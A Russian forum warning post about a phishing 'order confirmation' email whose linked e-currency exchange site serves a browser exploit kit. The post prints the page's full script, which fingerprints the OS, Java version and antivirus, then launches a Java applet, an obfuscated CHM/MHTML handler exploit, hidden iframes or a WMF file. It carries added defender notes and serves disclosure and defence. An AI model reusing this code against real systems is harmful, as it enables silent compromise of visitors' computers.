Осторожно!!! эксплойты от order@speedy-exchange.com 26.02.06 19:15  Число просмотров: 3319
Автор: Ara Статус: Незарегистрированный пользователь
Всем привет! К нам на почту пришло следующее сообщение от order@speedy-exchange.com <speedy-exchange27@yandex.ru>:

-----------------------------

Dear, xxx@xxx.ru
Thank you for your Cash2Ecurrency Order.
This message is to confirm the successful posting of your order with the following data:
 
ORDER SUMMARY:
Order Identification Number: 7837571
Ecurrency Ordered: E-Gold
Exact Amount You Will Receive: 850 USD worth of E-Gold
Our Service Fee: 68.00 USD ( 8% )
Exact Amount We Have To Receive: 918.00 USD
E-Gold Account that we will fund: 1126589
 
PAYMENT METHOD: You have selected to transfer money to us using Bank Transfer
 
PAYER INFORMATION:
Name: Stanislav Rudnik
City: Moscow | Zip code: 215502 
Country: Russia
Your contact email address: xxx@xxx.ru
 
You can view your order status here: www.speedy-exchange.com/orderstatus.html 
Changes to this order can be made here: www.speedy-exchange.com/orderchange.html 
 
================================================
Thank you for your appreciation and for using Speedy-Exchange.com.
www.speedy-exchange.com

---

-----------------------------


При заходе на www.speedy-exchange.com (якобы система обмена электронных валют) в зависимости от версии браузера загружается эксплойт. HTML-код следующий:

<BODY>
<DIV id=header><A 
title="Speedy Exchange : Independent Electronic Gold Currency Exchanger | Featured Ecurrencies: E-Gold, 1MDC, Pecunix, E-Metal, E-Currency    Featured Payment Methods: Bank transfer, Western Union, Credit Cards, ATM Debit Cards, Virtual Cards" 
href="http://www.speedy-exchange.com"><IMG height=69 
alt="Speedy Exchange : Independent Electronic Gold Currency Exchanger | Featured Ecurrencies: E-Gold, 1MDC, Pecunix, E-Metal, E-Currency    Featured Payment Methods: Bank transfer, Western Union, Credit Cards, ATM Debit Cards, Virtual Cards" 
src="img/speedyexchangelogo.gif" width=234 border=0></A> 
<P></P></DIV><!-- end header -->
<DIV id=wrap><!-- content -->
<DIV id=content>
<DIV id=navlist>
<DIV id=left>
<H1></H1>
<p>Please, wait while page is loading...</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</DIV>
<DIV id=right>
<DIV id=bottom>
<DIV id=logolist></DIV><BR class=clear></DIV><!-- end bottom row --><!-- footer -->
<DIV id=footer>
<P></P>
<P class=endnote><A class=endnote 
title="About Speedy Exchange : An Electronic Gold Currency Market Maker" 
href="http://www.speedy-exchange.com">Speedy-Exchange.com | 
Phone/Fax: +1-270-5740406 | Email: contact [at] speedy-exchange.com | © 
speedy-exchange.com 2003 - 2005</A> <BR>Speedy Exchange offers, and provides its 
products and services as an independent third party unrelated to E-Gold, 
OmniPay, Pecunix or any other company. All conditions, fees and charges are 
subject to change without further notice. Western Union, E-Gold, Pecunix are 
registered trademarks of their respective owners. </P></DIV><!-- end footer --><!-- end wrap --></DIV>

<!-- Hidden load targets for the script below (display:none, 5x5 px):
     StatPage receives the tracking beacon (StatPage.location=...),
     PageContainer receives the WMF file (PageContainer.location="ie0601e.wmf"),
     ObjectContainer receives the applet markup via innerHTML. -->
<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>
<DIV id="ObjectContainer"></DIV>
<!-- IE-only clientCaps behavior: exposes isComponentInstalled()/getComponentVersion()
     to GetVersion() for fingerprinting installed components. -->
<IE:clientCaps ID="oClientCaps" /> 
<script type="text/javascript" language="JavaScript">
   
 /**
  * Fingerprinting helper: asks the IE-only clientCaps behavior (the
  * <IE:clientCaps> element bound to oClientCaps) for the version of an
  * installed component, so the dispatcher below can choose a payload by build.
  *
  * @param {string} CLSID - component class id string, e.g. "{08B0E5C0-...}"
  * @returns {Array} the comma-split version string parts when the component
  *   is installed, otherwise the numeric array [0,0,0,0]. The two shapes differ
  *   in element type (strings vs numbers); callers only use [0] and [2] and
  *   rely on loose comparison (e.g. JVM_vers[2] < 3810).
  */
 function GetVersion(CLSID)
   {
            if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
               {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
            else
               {return Array(0,0,0,0);}
   }

 /**
  * Maps the navigator.appVersion string to a short Windows tag used as the
  * switch key in the dispatcher below.
  *
  * @param {string} IE_vers - navigator.appVersion as reported by IE
  * @returns {string|undefined} "95", "NT", "ME", "98", "2K", "XP" or "2K3";
  *   undefined when no substring matches, which sends the caller to the
  *   switch's default branch. "Windows NT 4" is tested before the "NT 5.x"
  *   strings, so the order of the chain matters. No statement terminators:
  *   the function relies on automatic semicolon insertion.
  */
 function Get_Win_Version(IE_vers)
   {
     if (IE_vers.indexOf('Windows 95') != -1) return "95"
     else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
     else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IE_vers.indexOf('Windows 98') != -1) return "98"
     else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
     else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
   }
 
 /**
  * Payload stage 4 (scheduled via setTimeout('Run_BOF()',2000) in the
  * dispatcher): writes four 1x1 borderless iframes loading pluginst.htm and
  * then one loading ie0601d.htm into the document. The name suggests a
  * buffer-overflow trigger lives in those pages; their content is not on this
  * page, so that is inferred from the name only. The loop index `i` is an
  * implicit global. For defenders: five same-origin requests for pluginst.htm /
  * ie0601d.htm within a second of the page load are the observable signature.
  */
 function Run_BOF()
   {
    self.focus();
    for (i=1 ; i <=4 ; i++)
    { 
        document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
    }
    document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');
   }
 
 // Exploit-kit dispatcher (runs inline at page load). Flow: beacon to the CGI,
 // fingerprint OS / service packs / JVM build / AV presence, pick an
 // ExploitNumber, launch that payload. Defender notes, grounded in this block
 // only (the payload files themselves are not on this page):
 //  * All beacons and payloads come from one host; the "ie0601*" names
 //    (cgi-bin/ie0601.cgi, ie0601a.jar, ie0601b.chm, ie0601c.htm, ie0601d.htm,
 //    ie0601e.wmf, pluginst.htm) are the distinctive proxy/IDS indicators.
 //  * Non-IE browsers only get the "?click" beacon; every exploit path requires
 //    IE on Win32.
 //  * Click_Request, j, FullVersion, PatchList, ServicePack, fNortonAV, fMcAfee,
 //    XP_SP2_patched, Trojan_Path, CHM_base, Protocol, Init_String and oMSITS
 //    are implicit globals.
 var CGI_Script="http://www.speedy-exchange.com/cgi-bin/ie0601.cgi";
 
 if (navigator.appName=="Microsoft Internet Explorer")
   {
      // Beacon URL; "&SPn" tokens are appended below before it is loaded into
      // the hidden StatPage iframe.
      Click_Request=CGI_Script+"?click";
      // Page base URL (everything before the last '/'), used to build absolute
      // paths for the applet and CHM payloads.
      var InetPath=document.location.href;
      j=InetPath.lastIndexOf('/');
      InetPath=InetPath.slice(0,j);
      
      var ExploitNumber=1; 
      var IEversion=navigator.appVersion;
      var IEplatform=navigator.platform;
      if (IEplatform.search("Win32") != -1)
      {
         // --- Fingerprinting ---
         var WinOS=Get_Win_Version(IEversion);
         // clientInformation is IE's alias for navigator; appMinorVersion is
         // assumed to be a ';'-separated token string (e.g. containing "SP2"),
         // which is what the split/indexOf below expects.
         FullVersion=clientInformation.appMinorVersion;
         PatchList=FullVersion.split(";");
         for (var i=0; i < PatchList.length; i++)
         {  
           ServicePack=PatchList[i];
           j=ServicePack.indexOf('SP');
           if (j != -1)
           {  
              ServicePack=ServicePack.substr(j);
              // Every service-pack token is reported back to the CGI.
              Click_Request=Click_Request+'&'+ServicePack; 
           }
         }
         // Fires the tracking request via the hidden iframe named StatPage.
         StatPage.location=Click_Request;
         // clientCaps component ids; the variable names indicate the Microsoft
         // Java VM and IE respectively (taken from the names, not verified
         // here). IE_vers is collected but never used in this block.
         var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); 
         var IE_vers   = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
         fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
         // AV detection: instantiating a vendor ProgID succeeds only when that
         // product is installed, so the empty catch blocks are the probe itself,
         // not swallowed errors. The objects are never used afterwards.
         try
         {
           var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization
           fNortonAV=1;
         }
         catch(e){} 
         try
         {
           var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization 
           fMcAfee=1;
         }
         catch(e){}

         // --- Payload selection ---
         // JVM_vers[0]!=0 means the component is installed (GetVersion returns
         // [0,0,0,0] otherwise); JVM_vers[2] is a string compared numerically.
         // Summary of the table below:
         //   old JVM (< x.x.3810)   -> 1 (Java applet), on every OS
         //   newer JVM, no AV       -> 3 (off-screen popup), except XP SP2 -> 5 (WMF)
         //   newer JVM, AV present  -> 4 (Run_BOF), 2K and the default branch -> 2 (CHM)
         // Unrecognised OS strings (Get_Win_Version returned undefined) fall
         // into the default branch.
         switch (WinOS)
         {
             case "2K":
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }    
                       else                                // if JVM = 5.0.3810.0 or higher
                       {
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; } 
                          else
                          { ExploitNumber=2; }  
                       }
                       break;
             case "2K3":
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; } 
                          else
                          { ExploitNumber=4; }  
                       break;             
             case "XP":
                                                                
                            if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                            {  ExploitNumber=1;  }    
                            else                                // if JVM = 5.0.3810.0 or higher
                            {
                               // SP2 detection reuses the token list built for
                               // the beacon; exact match on "SP2" only.
                               for (var i=0; i < PatchList.length; i++)
                               {  
                                  if (PatchList[i]=="SP2")
                                  {  XP_SP2_patched=1; }
                                 
                               }
                               if (XP_SP2_patched==0)
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=3; } 
                                  else
                                  { ExploitNumber=4; } 
                               }
                               else
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=5; } 
                                  else
                                  { ExploitNumber=4; }   
                               }
                            }
                       break;          
             default:  
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }             
                       else
                       {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher
                     
                       break;         
         }
         // launching exploit which number is depends on Windows and IE versions
        
         // --- Payload launch ---
         switch (ExploitNumber)
         {
             case  1:
                       // Java applet ie0601a.jar (class TakePrivileges) injected into
                       // the hidden ObjectContainer DIV; the CGI URL tagged
                       // "exploit=MS03-11" is passed as the ModulePath parameter,
                       // presumably where the applet fetches its module from.
                       // The tag reads like a Microsoft VM bulletin reference
                       // (likely MS03-011 - confirm against the jar).
                       Trojan_Path=CGI_Script+"?exploit=MS03-11";
                       ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1  height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';
                       break;
             case  2:
                       // unescape() yields "ms-its:mhtml:", so Init_String becomes
                       // ms-its:mhtml:file://C:\MAIN.MHT!<InetPath>//ie0601b.chm::/main.htm
                       // loaded through an OBJECT of type text/x-scriptlet. The
                       // percent-encoding presumably hides the "ms-its" token from
                       // simple string filters. This is the IE MHTML/CHM protocol
                       // handler path (consistent with the 2004 IE cumulative fix,
                       // MS04-013 - confirm). document.title="Loaded !" is a
                       // visible tell in the window title.
                       CHM_base='//ie0601b.chm'+'::'+'/main.htm';  
                       Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
                       oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>"); 
                       document.body.appendChild(oMSITS); 
                       document.title="Loaded !"; 
                       break;
             case  3:
                       // 50x50 popup positioned at (2000,2000), i.e. off most screens,
                       // loading ie0601c.htm; focus is then returned to this window
                       // so the popup stays out of sight.
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0"); 
self.focus();
                       break; 
             case  4:
                       // Deferred 2 s, then Run_BOF() writes the pluginst.htm /
                       // ie0601d.htm iframes. String-form setTimeout (eval-like).
                       setTimeout('Run_BOF()',2000); 
                       break;
             case  5:
                       // WMF file loaded into the hidden PageContainer iframe;
                       // chosen only for XP SP2 without the two AV products, which
                       // is consistent with the WMF rendering flaw patched in
                       // January 2006 (MS06-001 - confirm against the file).
                       PageContainer.location="ie0601e.wmf";
                       break;  
             default:
                       break;                   
          }

      }
   }
   else
   {
       // Non-IE browsers: beacon only, no payload.
       StatPage.location=CGI_Script+"?click";
   }
</script>
</BODY>

---